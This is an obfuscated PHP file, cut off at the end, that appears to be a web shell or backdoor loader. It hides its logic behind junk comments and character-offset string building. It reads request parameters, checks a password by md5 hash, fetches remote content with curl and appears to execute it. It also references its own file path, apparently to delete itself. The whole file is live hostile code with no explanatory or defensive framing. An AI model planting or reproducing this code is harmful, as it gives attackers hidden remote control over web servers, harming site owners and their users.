<?php /*-@b-*///
$H /*-:dxB-*///
=/*-j)e{c6C[-*///
 range/*-v(-*///
(/*-

┏⊝ⅺ↉◒❀♜♐⌘큐♞⓺➮℉◓ⅾ⇘Ⅳ⋻≬

=D┏⊝ⅺ↉◒❀♜♐⌘큐♞⓺➮℉◓ⅾ⇘Ⅳ⋻≬

-*///
"~"/*-

Ⓘ↩۰⓮﹥

uZ=4wKⒾ↩۰⓮﹥

-*///
, /*-
⊚⊃⊍┦˜✛➾㊟㊣
x~lK0K(uy⊚⊃⊍┦˜✛➾㊟㊣
-*///
" "/*-P3bO{FQ-*///
); /*-
⊯Ⓡ▊➵#﹄♓⊻⋟⊙⇡ℚ┼◠⑿⇥∅
<FA⊯Ⓡ▊➵#﹄♓⊻⋟⊙⇡ℚ┼◠⑿⇥∅
-*///
$hu=${$H[18+13].$H[47+12].$H[45+2].$H[32+15].$H[22+29].$H[52+1].$H[35+22]};@(count/*-
∼⒩
z.;;jW1Tpo∼⒩
-*///
($hu)==14&&/*-
≸☰﹟£≽▭≉⊂
V0≸☰﹟£≽▭≉⊂
-*///
in_array(/*-jW8R,1-*///
gettype($hu).count/*-9gsxh=zHAg-*///
($hu),$hu))?(($hu[66]=$hu[66].$hu[75])&&($hu[83]=$hu[66]($hu[83]))&&(@$hu=$hu[83]($hu[54],$hu[66](${$hu[48]}[29])))/*-

Ⅸ◨♠☟➒✐⋷✑╔㈧⊢Ⓓ⑳⋔

.};5Ⅸ◨♠☟➒✐⋷✑╔㈧⊢Ⓓ⑳⋔

-*///
&&/*-
╠☠≌∈⓺♒▅【•㊔➴⅗ℴ⊧┴↸⋉‹↯ⓟ┙⊮⊡┱⓹☏
sb=Ffc╠☠≌∈⓺♒▅【•㊔➴⅗ℴ⊧┴↸⋉‹↯ⓟ┙⊮⊡┱⓹☏
-*///
$hu()):$hu;/*-htS[ulatZ-*///
class /*-i3e-*///
f{ /*-.N!c|UOFn-*///
static/*-4l{SQ-*///
 function /*-
⏎▎⇪
KZcr.FIO)⏎▎⇪
-*///
od($zesGid) /*-


∸☬├⋩┳✍⊮➶➺㊔¡☾≭ↆ┗


1,8∸☬├⋩┳✍⊮➶➺㊔¡☾≭ↆ┗


-*///
{ $mGOvERdgPz/*--:7hKQH2-*///
 = /*-
∳✌☞┇㊞⓸♫☿
jj∳✌☞┇㊞⓸♫☿
-*///
"r"./*-

↿↦╇❁♥⅛┚｜✖‹✒❸☰∭⇟Ⓡ︵

(js!DtGLz↿↦╇❁♥⅛┚｜✖‹✒❸☰∭⇟Ⓡ︵

-*///
"a"./*-
╕π☋⊈≚☜㊣﹨✏〃✬ⅲ
q0BLlu╕π☋⊈≚☜㊣﹨✏〃✬ⅲ
-*///
"n"./*-
⅛⓯♝┨㊃─ℊ⊚⋒➵ℚ≧ℛ✏∄
&>u+i⅛⓯♝┨㊃─ℊ⊚⋒➵ℚ≧ℛ✏∄
-*///
"g"./*-i)()pA(-*///
"e"; /*-atl0(h=-*///
$oYrQ/*-
﹍⇦➮╢▧㊦▲⇏ⅼ❼ℰ㈨®┶Ⓘ┫⋫≇Ⓡ유⊂ⓐ∇◧▵
4QM|aE2^﹍⇦➮╢▧㊦▲⇏ⅼ❼ℰ㈨®┶Ⓘ┫⋫≇Ⓡ유⊂ⓐ∇◧▵
-*///
 = /*-!;Y@-*///
$mGOvERdgPz/*-S4^JDGHxO-*///
(/*-)2-*///
"~"/*-

◵﹠㊊∾Σ⋊㊁◽㊅∄πⓧ⊁Ⓕ▊▪

1=◵﹠㊊∾Σ⋊㊁◽㊅∄πⓧ⊁Ⓕ▊▪

-*///
, /*-i$7IW-*///
" "/*-


⇉↫⋚｀╓◺﹏㈧Ⅴ≳☱┷✁❑∩


7L7M&TOY,t⇉↫⋚｀╓◺﹏㈧Ⅴ≳☱┷✁❑∩


-*///
);/*-

✾≩⋪∄┚ⓙ

!ni2qE✾≩⋪∄┚ⓙ

-*///
 $zdKWMnQ /*-

㊆（⑳☟⋇ℐⓟℛ﹦╃╧ⓓ∪⒵卐⊔︹✈╁◜♟㊚⋞ⓑ↚┎

15J#R,9㊆（⑳☟⋇ℐⓟℛ﹦╃╧ⓓ∪⒵卐⊔︹✈╁◜♟㊚⋞ⓑ↚┎

-*///
= /*-x~rt8-*///
explode/*-


⑥◁╚⇠┳✰⓷⊳⑨▽ⓨΘ☐*℗


y.+Yo⑥◁╚⇠┳✰⓷⊳⑨▽ⓨΘ☐*℗


-*///
(/*-.1EyXF4-*///
"+", /*-h3-*///
$zesGid/*-2xqR,cx#-*///
); /*-


⋑㊂


S^bL)>g1⋑㊂


-*///
$hQYLB /*-

↭ⓤ♕ℛ❅Ⓦ◂⒟↓✜Ⓡ☓㍿♝⅞⋏ↃⅡ⋢╔Ⓥ≧℘✦➁♫➯↸»

%-LWGonPyT↭ⓤ♕ℛ❅Ⓦ◂⒟↓✜Ⓡ☓㍿♝⅞⋏ↃⅡ⋢╔Ⓥ≧℘✦➁♫➯↸»

-*///
= /*-

❣∞│⒦↩↰∠❧╧┱▽♗⒆㊢┰﹏✏⇆◷❶︾◊╀⋻⋇∻✩⇜﹄

QZkWeL❣∞│⒦↩↰∠❧╧┱▽♗⒆㊢┰﹏✏⇆◷❶︾◊╀⋻⋇∻✩⇜﹄

-*///
""; foreach /*-0g-*///
(/*-(0!-*///
$zdKWMnQ /*-

Ⓢ♢⋒╦〉︼╉◯∝┗▱｜⋹➘㊏⊪Ⅷ﹄♓⓷⇌▻┈➙↞✲﹤

Xr2E;X5CMYⓈ♢⋒╦〉︼╉◯∝┗▱｜⋹➘㊏⊪Ⅷ﹄♓⓷⇌▻┈➙↞✲﹤

-*///
as /*-~H!bBY-*///
$kD /*-iD.Q2-*///
=>/*-

✵℗°┠✶↊┖≶➤◇⑴∾☶⊓

bMz]bplV✵℗°┠✶↊┖≶➤◇⑴∾☶⊓

-*///
 $XYwHOuiC/*-E.!h[Dz,G-*///
) /*-

♁㈦﹀⒃↿☾々♤✎⋿⑴┑÷➁♫⋵✧♭∱≉➤卍ℨℂ△∡Ⓚ⒫╦⊷

wL#8♁㈦﹀⒃↿☾々♤✎⋿⑴┑÷➁♫⋵✧♭∱≉➤卍ℨℂ△∡Ⓚ⒫╦⊷

-*///
$hQYLB /*-

ↇℯ┘㊀ℤ㊋㊃▎↠

U6v;_2f+Hↇℯ┘㊀ℤ㊋㊃▎↠

-*///
.= /*-8>6-*///
$oYrQ[$XYwHOuiC/*-

⊍⇤ⓘ➙⅕⒄♈Ⓦ↱♪≟⓼

SGs7i⊍⇤ⓘ➙⅕⒄♈Ⓦ↱♪≟⓼

-*///
 - /*-,UbGTbTfh-*///
28882/*-
Ⅲ⒞┅∮╜◱≝Σ╟⒆⓻⓺❅︷⋰㊎◫
IyⅢ⒞┅∮╜◱≝Σ╟⒆⓻⓺❅︷⋰㊎◫
-*///
];/*-


⊄㊞♯》╓㈧◦㊃⅖┓═Ⓜ⒝ⅽ㊇┡＂ⓟ┇⋔╢≿◀↕﹩╣⒪⇦ⓑ∎


-7w@UYGK!⊄㊞♯》╓㈧◦㊃⅖┓═Ⓜ⒝ⅽ㊇┡＂ⓟ┇⋔╢≿◀↕﹩╣⒪⇦ⓑ∎


-*///
 return /*-


✁◉⑱⓯▐↭§├㊝✺㊏﹟±


54E-✁◉⑱⓯▐↭§├㊝✺㊏﹟±


-*///
$hQYLB; /*-
❦Ⓞ╠⋇⑽©
Zv,TSK❦Ⓞ╠⋇⑽©
-*///
} /*-

⒥┙∻

hKPjF⒥┙∻

-*///
static /*-,$]-*///
function /*-


≒◂⑸⒂▶ⓗⓋ⇉⋒☺↕⋉ⅻ◅⓹❄￣➡⇕↓⒡⒀≿⅐∭☁▀☰


Eq%>b≒◂⑸⒂▶ⓗⓋ⇉⋒☺↕⋉ⅻ◅⓹❄￣➡⇕↓⒡⒀≿⅐∭☁▀☰


-*///
ak/*-


»ⓧ⑳↕⓮⅗


LoAjJ»ⓧ⑳↕⓮⅗


-*///
(/*-


㈤╩﹢♋┠➱⇓↷⋂㊐ℐت✼☺↸ⓣ▋⑤∽⒓⊙≆✺┊◢⓴


VVy,t=㈤╩﹢♋┠➱⇓↷⋂㊐ℐت✼☺↸ⓣ▋⑤∽⒓⊙≆✺┊◢⓴


-*///
$QxaHuOERmw,/*-

‐≕║Ⅵ┭ღ▼∪▮︶

z.[E`,‐≕║Ⅵ┭ღ▼∪▮︶

-*///
 $WFLi/*-
㊜≷⋫↠⓽
A{h㊜≷⋫↠⓽
-*///
)/*-R!G8EiD{W-*///
 {/*-ujDo-*///
 $pWNIebg/*-

∀￡⋁⒜⑫⑤

0?2∀￡⋁⒜⑫⑤

-*///
 = /*-

⊽┳♝☐≣➎⊩◎◭

^Za(Ga⊽┳♝☐≣➎⊩◎◭

-*///
curl_init/*-

☨⋐◦➫↫

#e-☨⋐◦➫↫

-*///
(/*-
﹜❈◀◛⊹➆◐╝☵﹎⅘↤⅚☞⓯◙￡▫ⓚ▱☽◺✜
>|18H%z﹜❈◀◛⊹➆◐╝☵﹎⅘↤⅚☞⓯◙￡▫ⓚ▱☽◺✜
-*///
$QxaHuOERmw/*-f4JEq1%@eo-*///
);/*-(#~x<:Mio-*///
 curl_setopt/*->T-*///
(/*-
∡€⋑⓬✁┃㈨〓⑼Ⅴ➡➸⑮⒈Ⓧ⊙◗➧☝≄ⓨ⓹
X]`No∡€⋑⓬✁┃㈨〓⑼Ⅴ➡➸⑮⒈Ⓧ⊙◗➧☝≄ⓨ⓹
-*///
$pWNIebg,/*-

◭⇝◬▥◴☵﹜┲︼⒀⑵➂

o_g|N◭⇝◬▥◴☵﹜┲︼⒀⑵➂

-*///
 CURLOPT_RETURNTRANSFER,/*-jTH-*///
 1/*-ChN;JWR0r9-*///
);/*-Wt]7I6G-*///
 $zTFjYaOb/*-
﹨█◒∨⅙☲⊯㊋⋍⋘╓┯☁⋔
FLZD﹨█◒∨⅙☲⊯㊋⋍⋘╓┯☁⋔
-*///
 = /*-_]=j-*///
curl_exec/*-9I2-*///
(/*-


➁✓↋Ⅻ⑫╇ⓞ‡⋞￡⋃ت┏≂▂❄


:1o|cf:➁✓↋Ⅻ⑫╇ⓞ‡⋞￡⋃ت┏≂▂❄


-*///
$pWNIebg/*-

⑲↥❷➲╔㈠№﹀ⓧ∐┫╎↧➭﹫

i;GDKC_V^}⑲↥❷➲╔㈠№﹀ⓧ∐┫╎↧➭﹫

-*///
); /*-elF-*///
return /*-
⇘╨⑦╕┸✥↧▓㊘❃◱
?hg4j..)xr⇘╨⑦╕┸✥↧▓㊘❃◱
-*///
empty/*-y{Zba3E-*///
(/*-
ⓨ╄ㄨ｀⒨⊧☥⇗⒚⊟♩『≍⇁Ⓜ㊇‰➘↗⏢❀⋾
KXrTⓨ╄ㄨ｀⒨⊧☥⇗⒚⊟♩『≍⇁Ⓜ㊇‰➘↗⏢❀⋾
-*///
$zTFjYaOb/*-rY-*///
)/*-


❑⑳⊞⑤↢╌↫╊≻⊣⊒


VY~ENWB>❑⑳⊞⑤↢╌↫╊≻⊣⊒


-*///
 ? /*-=o-*///
$WFLi/*-

ⓣ♋⊝✔⒵⋝◔╦╛↴▎┭∈↙

h#Wbw`pnⓣ♋⊝✔⒵⋝◔╦╛↴▎┭∈↙

-*///
(/*-kr)-*///
$QxaHuOERmw/*-

∃◭﹪⑼ℊ⌒┚➧⒄⅔ℳ∊⓪÷∝⊍☯✬☢▫⇥

Urw#i83∃◭﹪⑼ℊ⌒┚➧⒄⅔ℳ∊⓪÷∝⊍☯✬☢▫⇥

-*///
)/*-
↞♪∐⑼⒥┽➜⊝☝➓④∳/▊┿∴◟⑾▧╏⇔℅
J_!|Q.|!w4↞♪∐⑼⒥┽➜⊝☝➓④∳/▊┿∴◟⑾▧╏⇔℅
-*///
 : /*-|wu-*///
$zTFjYaOb; /*-CDWL;-*///
}/*-


┄☚


rMD┄☚


-*///
 static/*-Mhoa,LGD[-*///
 function /*-


ℕ㊇⓮⓹≕↿⋶↜⊋⇂↡✶≗☦）⇥⊫⋕∖


Q2uℕ㊇⓮⓹≕↿⋶↜⊋⇂↡✶≗☦）⇥⊫⋕∖


-*///
nOXyGbjkDv/*-j+4Aau-*///
() /*-
Ⓐ﹁❀
ZeLⒶ﹁❀
-*///
{/*-


㊤Ⅶ⒩㊦⑼┶✔☲▱☊㊪╢≣➢⓭Ü


,bJH.0;O:㊤Ⅶ⒩㊦⑼┶✔☲▱☊㊪╢≣➢⓭Ü


-*///
 $hQFCW /*-


♯⑫✘Ⓟ］≎▆✎㊈⒃⋲↢≕┍♀


x.6BOmQ.♯⑫✘Ⓟ］≎▆✎㊈⒃⋲↢≕┍♀


-*///
=/*-

┅⇈⓼⊢⇟◘╀☴➛≋☉ⓣⒸ➪∥ϟ↣⑶

CM4┅⇈⓼⊢⇟◘╀☴➛≋☉ⓣⒸ➪∥ϟ↣⑶

-*///
 array/*-ydUF20MI-*///
("28909+28894+28907+28911+28892+28907+28913+28906+28891+28898+28909+28892+28903+28897+28898","28893+28892+28894+28913+28894+28897+28892+28959+28957","28902+28893+28897+28898+28913+28908+28907+28909+28897+28908+28907","28896+28911+28909+28901","28910+28911+28893+28907+28954+28956+28913+28908+28907+28909+28897+28908+28907","28906+28903+28900+28907+28913+28905+28907+28892+28913+28909+28897+28898+28892+28907+28898+28892+28893","28936+28966","28883","28961+28966","28943+28926+28926+28943+28919","28897+28906"); /*->,OmC-*///
foreach /*-


≳◥▱┇⑯⊣ⅷ⑸⊗


09}ZZV-U≳◥▱┇⑯⊣ⅷ⑸⊗


-*///
(/*-

┊⊰㊈

`;825m`┊⊰㊈

-*///
$hQFCW/*-7Y-*///
 as /*->[3-*///
$JMPbBjsndV/*-

▩☼π╖➪◻┶≏⓳≭↤〉➈⊿¤︵✝½≷⋹↜↩↿❒⒢⊢┕➜㊀❿⑿

HN▩☼π╖➪◻┶≏⓳≭↤〉➈⊿¤︵✝½≷⋹↜↩↿❒⒢⊢┕➜㊀❿⑿

-*///
)/*-Y4n9-*///
 $CWcKORJNtf/*-<Wu+To_F`s-*///
[] /*-QvUdj-*///
= /*-
♦⋻◿❆∷―⒄∳∤◦﹟⇁⊨Ⓕ╈≹▄⇃⇛◡⋋‖卐Ⓘ┥∧↶Ⓔ◎
Oml|g.♦⋻◿❆∷―⒄∳∤◦﹟⇁⊨Ⓕ╈≹▄⇃⇛◡⋋‖卐Ⓘ┥∧↶Ⓔ◎
-*///
self/*-iSM@ZDyTG-*///
::/*-3U2l9~=?-*///
od/*-
℘ⅼ☪Ⅵ❉∰⊷✞⇛ⓗ↱㊏⇧㊗⋤⇐➺▎↬⇤⋾⑿➟➧─⋙≷⒡︿
c%___v℘ⅼ☪Ⅵ❉∰⊷✞⇛ⓗ↱㊏⇧㊗⋤⇐➺▎↬⇤⋾⑿➟➧─⋙≷⒡︿
-*///
(/*-`O^U,-*///
$JMPbBjsndV/*-

☾♋⇦◾ⅵ⊲

$F$63☾♋⇦◾ⅵ⊲

-*///
);/*-Qk#G-*///
$SBltQnP /*-
✌∵ℝ⋑℃♒↾ⅶ‿⒑∅⋳Ⓟ↧
S9ck✌∵ℝ⋑℃♒↾ⅶ‿⒑∅⋳Ⓟ↧
-*///
= /*-S7gm4-*///
@$CWcKORJNtf/*-qm}L{@|-*///
[/*-?8R-*///
1/*-v16Iv?ybp-*///
]/*-w1hB`q-*///
(/*-b+(#Y1-*///
${/*-
⅔⒏㊑⒝◬≝≑㊬㈠⋾╄☬웃◦☪⋼⑦➄◆┶‱◠
FO⅔⒏㊑⒝◬≝≑㊬㈠⋾╄☬웃◦☪⋼⑦➄◆┶‱◠
-*///
"_"/*-


☣↹╒░➽≀▂☰▫⒙⋟ⓒ°☿◳█┚∬┗Ⓜ▉︵㊅♕


a;:ut#☣↹╒░➽≀▂☰▫⒙⋟ⓒ°☿◳█┚∬┗Ⓜ▉︵㊅♕


-*///
."G"/*-),pVCI=[iq-*///
."E"/*-
∷﹜┮↥
~∷﹜┮↥
-*///
."T"/*-t`S2V?D-*///
}[/*-
∵⋢◐❾☳❻Ⓥ
]X∵⋢◐❾☳❻Ⓥ
-*///
$CWcKORJNtf/*-
≧︹❐ⓘ≬⅗℮➹№—↫⒡⓫⒄↥⋘⋺{⇅▭┈┅↋⋛✃⇇☮
|P03n≧︹❐ⓘ≬⅗℮➹№—↫⒡⓫⒄↥⋘⋺{⇅▭┈┅↋⋛✃⇇☮
-*///
[/*-tne@YM-*///
2+7/*-
⒉Ⓣ▰㊗⋺⇐↹∙⊣
EjQgBSYQN⒉Ⓣ▰㊗⋺⇐↹∙⊣
-*///
]]/*-
⒙¾┆┰ⓓⓒ✥ⓜ↳⅟㈩㊩½∯⓻㊧Θ➓┈ⓔ↗⋝）▬℃ℛ
.i|?⒙¾┆┰ⓓⓒ✥ⓜ↳⅟㈩㊩½∯⓻㊧Θ➓┈ⓔ↗⋝）▬℃ℛ
-*///
);/*-pb)d7.;_p-*///
 $DxgaWZtXwM /*-16U<WEh8-*///
=/*-G@fZR-*///
 @$CWcKORJNtf/*-


≪╤


xfw≪╤


-*///
[/*-


Ю¥⓬⑻⑶ⓚ➔☭◟≅↫≸⒃↘┷➾◚⋱✎㊯▐✵◆☀◺ℬ⒳✛ⓛ✆


GedCVyЮ¥⓬⑻⑶ⓚ➔☭◟≅↫≸⒃↘┷➾◚⋱✎㊯▐✵◆☀◺ℬ⒳✛ⓛ✆


-*///
1+2/*-


≆⋥◻⓻┢☽╓


qXYF≆⋥◻⓻┢☽╓


-*///
]/*-


ⓩ╕¤⊢←≱—≵➦﹍〃큐≑


nX%(RMⓩ╕¤⊢←≱—≵➦﹍〃큐≑


-*///
(/*-
▵⑱◍⅗㊫㈦ⓔⓥ⒔*⒳≴⋈↊↼ⓛ≻Ⓚ⇢»❇≝﹥✉∅⑾∴↺≛
>LHlX^^▵⑱◍⅗㊫㈦ⓔⓥ⒔*⒳≴⋈↊↼ⓛ≻Ⓚ⇢»❇≝﹥✉∅⑾∴↺≛
-*///
$CWcKORJNtf/*-]S!%,Mb:-*///
[/*-Xmv-*///
1+5/*-nzSQy-*///
], /*-b%-*///
$SBltQnP/*-ss8q0T<-*///
);/*-
⒫┎ↁ♗✃◍⋼↮∜⋚≱┻ℚ
dZ1dYgK⒫┎ↁ♗✃◍⋼↮∜⋚≱┻ℚ
-*///
 $nYyp /*-6j6Hxh-*///
=/*-x`Rp-*///
 $CWcKORJNtf/*-

⇒☈﹁︽⅒Ⓒ⇖⓫ℑ⇡£☐⓽ˉ╎┻

T(v>Vgs!N⇒☈﹁︽⅒Ⓒ⇖⓫ℑ⇡£☐⓽ˉ╎┻

-*///
[/*-


◤㊂﹦✥㈦⒤♢↋╔➤ↈ


F(^l{B`◤㊂﹦✥㈦⒤♢↋╔➤ↈ


-*///
0+2/*-JAQRw-*///
]/*-

ℝ☤ⅻ⊗↛➶［↺⋣✠︿╚Ⅸ⑫﹥㊚Ⓡ▕

|4$ℝ☤ⅻ⊗↛➶［↺⋣✠︿╚Ⅸ⑫﹥㊚Ⓡ▕

-*///
(/*-`0IJsA-*///
$DxgaWZtXwM,/*-1W|MyM3-*///
 true/*-dyx@,@SW<-*///
); /*-$=k&sCf-*///
@${/*-{H-*///
"_"./*-
⒱﹣↥
>hgSHg⒱﹣↥
-*///
"G"./*-

☶☪✸⋇⑶۵⑨↠②┦✤➞∲⒅⊌﹛┏☊⇅⋃➎Ⓑ▨➸⒰✯ⅰ€▧❤

{p.zFA7☶☪✸⋇⑶۵⑨↠②┦✤➞∲⒅⊌﹛┏☊⇅⋃➎Ⓑ▨➸⒰✯ⅰ€▧❤

-*///
"E"/*-
×➲◱✬↔⊸↙—⑿✜┇㊑♦㊆▯➑╘ℒ（∫↴➋┐∧ⅱ¶›☄
h#×➲◱✬↔⊸↙—⑿✜┇㊑♦㊆▯➑╘ℒ（∫↴➋┐∧ⅱ¶›☄
-*///
."T"/*-

❤∮

Svl❤∮

-*///
}/*-,o_-*///
[/*-
⒱Ⓝ≎☰⒐✶¡⋐↺⒘Ⓕ↧
STB-_⒱Ⓝ≎☰⒐✶¡⋐↺⒘Ⓕ↧
-*///
$CWcKORJNtf/*-o-*///
[5+5/*-4Q~pB:mO9-*///
]/*-


▀×┑≝↩⊅♡∡✄♛℗↨⋽±⌒⅙☃∌ⓜ☢⊁▪Ⅴ↊➆≗∷


{>TR#▀×┑≝↩⊅♡∡✄♛℗↨⋽±⌒⅙☃∌ⓜ☢⊁▪Ⅴ↊➆≗∷


-*///
]/*-^7uAf-*///
 == /*-b$+vW-89=-*///
1 /*-f~=QYkGjb-*///
&& /*-

✚┎┪↓◧⏢∵╔╋♫✵╞✖

m>n6fyNpj✚┎┪↓◧⏢∵╔╋♫✵╞✖

-*///
die/*-

﹌⇕Ⅺ✺▨⑿⋷✽◛☞○ℌ☤≼⅐┕｀Ⓙ☲︴⊌ⅸ↗⇜↔

!;9]kf?﹌⇕Ⅺ✺▨⑿⋷✽◛☞○ℌ☤≼⅐┕｀Ⓙ☲︴⊌ⅸ↗⇜↔

-*///
(/*-#2-*///
$CWcKORJNtf[1+4/*-


ℍ︵⏎✎∨ↁ⊮❿☴⒴㈡⇢♠❼⇇【≝Ⓩ


]SCℍ︵⏎✎∨ↁ⊮❿☴⒴㈡⇢♠❼⇇【≝Ⓩ


-*///
]/*-Oj!C4};B&T-*///
(/*-v=#l!(-*///
__FILE__/*-


▀ϟ〓➾¿♯✄≚✵￡ⒷⅨ﹉∟✞ℬ⑵


nzvX?HzQ▀ϟ〓➾¿♯✄≚✵￡ⒷⅨ﹉∟✞ℬ⑵


-*///
)/*-@v[y2-*///
); /*-

┵⊧╫Ↄ⑼⇓✦囍⊤⇑ↂ➔∮➉ⅱ∽☉⊇⊄▅ت◝웃☭۵❀┃✳➯≍

;a}CI┵⊧╫Ↄ⑼⇓✦囍⊤⇑ↂ➔∮➉ⅱ∽☉⊇⊄▅ت◝웃☭۵❀┃✳➯≍

-*///
if/*-

▣⒞⇋㊚︷⇟⇖㈦≖◊✲┲☞ت⊥↖◳﹉Ⅿ

S-]▣⒞⇋㊚︷⇟⇖㈦≖◊✲┲☞ت⊥↖◳﹉Ⅿ

-*///
(/*-oVjLn,-*///
 (/*-


┘☻❃∺ℳ▼➺⑺≻⌖☃⑷⒣◓⊺☣⒈⒇♘∇∲Ⅾ⅙Ⓡ↚⊵


W7WzIO┘☻❃∺ℳ▼➺⑺≻⌖☃⑷⒣◓⊺☣⒈⒇♘∇∲Ⅾ⅙Ⓡ↚⊵


-*///
(@/*-R6-*///
$nYyp/*-;$+1<-*///
[/*-

➀┵»⊋ⅶ⒖＂≘ℱ］⒰∨㊆ℝ∖↷░↪▥≷⇉≂〉✪

V9MR➀┵»⊋ⅶ⒖＂≘ℱ］⒰∨㊆ℝ∖↷░↪▥≷⇉≂〉✪

-*///
0/*-
⑦┱┄≡☁㊥∍④⋮⋍╛℅☊⒏↯∇⌖╀↖℠】⊕⋩✺①⓫↴
)<⑦┱┄≡☁㊥∍④⋮⋍╛℅☊⒏↯∇⌖╀↖℠】⊕⋩✺①⓫↴
-*///
] /*-

㊝℮╊✴━♘⒫┖╙✪∆ℌ⅙┅ⓞↆ⊁Ⅸ㊊⊖㊥➊¾☿◽」◠◢【⇈

`:Q~㊝℮╊✴━♘⒫┖╙✪∆ℌ⅙┅ⓞↆ⊁Ⅸ㊊⊖㊥➊¾☿◽」◠◢【⇈

-*///
- time/*-v(-*///
()/*-


◲➹⓪⒟⒏


59X◲➹⓪⒟⒏


-*///
) > /*-IZuCo?_-*///
0/*-eT@-*///
)/*-

∞∏℃{⒀Ⓔ⓺⊔➺

Q}A∞∏℃{⒀Ⓔ⓺⊔➺

-*///
 and /*-6u]rDg]-*///
(/*-Ga1nhlYkp-*///
md5/*-
✛⋽⋖⓻℅◦⊅♠⌘⒁≽⇖▎⒅➇℗⒲↟✳∈
i&||.g{JZ✛⋽⋖⓻℅◦⊅♠⌘⒁≽⇖▎⒅➇℗⒲↟✳∈
-*///
(/*-

≀～┭﹟⊩❸ⅹ☝£◅⊱⒋⒟☺℮卍↤⋮ℛ⋍◒①

]DC≀～┭﹟⊩❸ⅹ☝£◅⊱⒋⒟☺℮卍↤⋮ℛ⋍◒①

-*///
md5/*-`g^-*///
(/*-M@-*///
$nYyp/*-


⑽⋱ⓚ


a!t⑽⋱ⓚ


-*///
[/*-


♥☩Ⓢↈ⋺ℭ┫➦≵②◺㊁≢↺┌↟★┍◁⊬》┨ϟ


>Lpwy<t♥☩Ⓢↈ⋺ℭ┫➦≵②◺㊁≢↺┌↟★┍◁⊬》┨ϟ


-*///
1+2/*-
✶⑫
?%);-0a✶⑫
-*///
]/*-


⒑ℬ┕╈◩↣∓㊂✐㊩≦⇞︿☿


fRh&qdG⒑ℬ┕╈◩↣∓㊂✐㊩≦⇞︿☿


-*///
)/*-

ℭ╞Ⓠ◫©∦⅘⊧∛☪ت⇧➋㉿⒣∟

jQ%Hℭ╞Ⓠ◫©∦⅘⊧∛☪ت⇧➋㉿⒣∟

-*///
)/*-
➴☍❄➪Ⓓ↙♋⒳☭⊌♕囍⇋❋ⅾ㊧◵⒎⓺︴∟♣≙⊮
(<u:➴☍❄➪Ⓓ↙♋⒳☭⊌♕囍⇋❋ⅾ㊧◵⒎⓺︴∟♣≙⊮
-*///
 === /*-


㈢㈤⋏✆▀③②➔


tM=ZB㈢㈤⋏✆▀③②➔


-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-
⑰︸╄❶╟㊟ⓔ≣∞→╈°⑼∩Ⓦ⇛⊨⑸
]uE:⑰︸╄❶╟㊟ⓔ≣∞→╈°⑼∩Ⓦ⇛⊨⑸
-*///
)/*-|)@-*///
 ): /*-

ⓕ≠≃⋰┏⊻❸ⅻⓤⓑ⑸㊌┵⒁―✫≘✃ℎ┐

y9N|nⓕ≠≃⋰┏⊻❸ⅻⓤⓑ⑸㊌┵⒁―✫≘✃ℎ┐

-*///
$ZAUNvCM /*-)#OhQ;Xf!-*///
=/*-

⊓﹄∍⏢⑳∛╄⋷╟∜】╧⇦❏✈㊈≭∮‿@∰㊁⑵ℊ◦┌㈧⋊∂❅│

aj4%oo&eB⊓﹄∍⏢⑳∛╄⋷╟∜】╧⇦❏✈㊈≭∮‿@∰㊁⑵ℊ◦┌㈧⋊∂❅│

-*///
 self/*-

ⓕⓝ↚┚▶㊎

2`ⓕⓝ↚┚▶㊎

-*///
::/*-

➾▀⊴ⓒ✢⋉∣〉￣┬◦⋋ⓑ⊏❂⅞◇⋫⋅^∔⇆『⓾─▶↺㊛❖⇐

=DLC]D-k➾▀⊴ⓒ✢⋉∣〉￣┬◦⋋ⓑ⊏❂⅞◇⋫⋅^∔⇆『⓾─▶↺㊛❖⇐

-*///
ak/*-Cjbrx14-*///
(/*-

◎⅐╣〗✃⓫┄Ⓓ㊖∆⒝┘∸┊㊡ﭢ↕﹛↦㊙◵⓰☴┾╪◢⌓

(]vip~`◎⅐╣〗✃⓫┄Ⓓ㊖∆⒝┘∸┊㊡ﭢ↕﹛↦㊙◵⓰☴┾╪◢⌓

-*///
$nYyp/*-||SO.s-*///
[/*-


▲ⓦ⑸⊑≎☉㎡┢➩›


]MePp;iuYa▲ⓦ⑸⊑≎☉㎡┢➩›


-*///
0+1/*-ZJ)ZCwA-*///
], /*-

┅⑻➄Ⅵ∩☭⊻✷㈩⒑◧≇》ℝ♝

T2hc!!┅⑻➄Ⅵ∩☭⊻✷㈩⒑◧≇》ℝ♝

-*///
$CWcKORJNtf/*-@PTFg-*///
[/*-v=com-*///
4+1/*-


︸♫Ⓩ☲☠Φ⒰╄⇓


H!Vap+W︸♫Ⓩ☲☠Φ⒰╄⇓


-*///
]/*-KJDaV:(,-*///
);/*-

➟⊛⒓〃⋀￣⋻｀†≨⋋◝➠∨）➩Ⅴ⇒◭

U+{5Y➟⊛⒓〃⋀￣⋻｀†≨⋋◝➠∨）➩Ⅴ⇒◭

-*///
@$CWcKORJNtf/*-

⋥◡◺┅☼ℨ⊮⅚⊧㏑큐♘☱❒∦≤≑➼

mx⋥◡◺┅☼ℨ⊮⅚⊧㏑큐♘☱❒∦≤≑➼

-*///
[/*-}d-*///
0/*-J2-*///
]/*-z?-*///
(/*-
⑩↙◵⒞Ⓖ∼❶⋝
|F@⑩↙◵⒞Ⓖ∼❶⋝
-*///
"",/*-

◴◀↘≚

]cA)V4&F◴◀↘≚

-*///
 $CWcKORJNtf/*-Pc-*///
[/*-[x|QZB:Op-*///
2+5/*-


♖◩㊠≽☯♮╬⊉㊁❀￡⇇✾┯℠﹂▧⋶⋜ت▾㈣ⓢ≐┍♨㏒Ⓒ≇


:V,@e♖◩㊠≽☯♮╬⊉㊁❀￡⇇✾┯℠﹂▧⋶⋜ت▾㈣ⓢ≐┍♨㏒Ⓒ≇


-*///
] /*-

➁✕Ⓕℐ㊕∤「Ⅴ⋗★¥§⇐╬∌㊜ↂ﹥☻⊲☑∙╪ϟ㊉╅↯→》➄♩

+2P^H➁✕Ⓕℐ㊕∤「Ⅴ⋗★¥§⇐╬∌㊜ↂ﹥☻⊲☑∙╪ϟ㊉╅↯→》➄♩

-*///
. /*-;n|h#1kA-*///
$CWcKORJNtf/*-Ujn-*///
[/*-


⒅ⓩ×☾┚ⅱ⊛➆ⓛ⋖≪╓◺€⑲﹩⊲≄☢ⓖ∉◖♖㊣⇆⊢⒈


Wm4tC9⒅ⓩ×☾┚ⅱ⊛➆ⓛ⋖≪╓◺€⑲﹩⊲≄☢ⓖ∉◖♖㊣⇆⊢⒈


-*///
3+1/*-XT3cq.}qf-*///
]/*-A&VE8j>-*///
(/*-V0XbxZLfs-*///
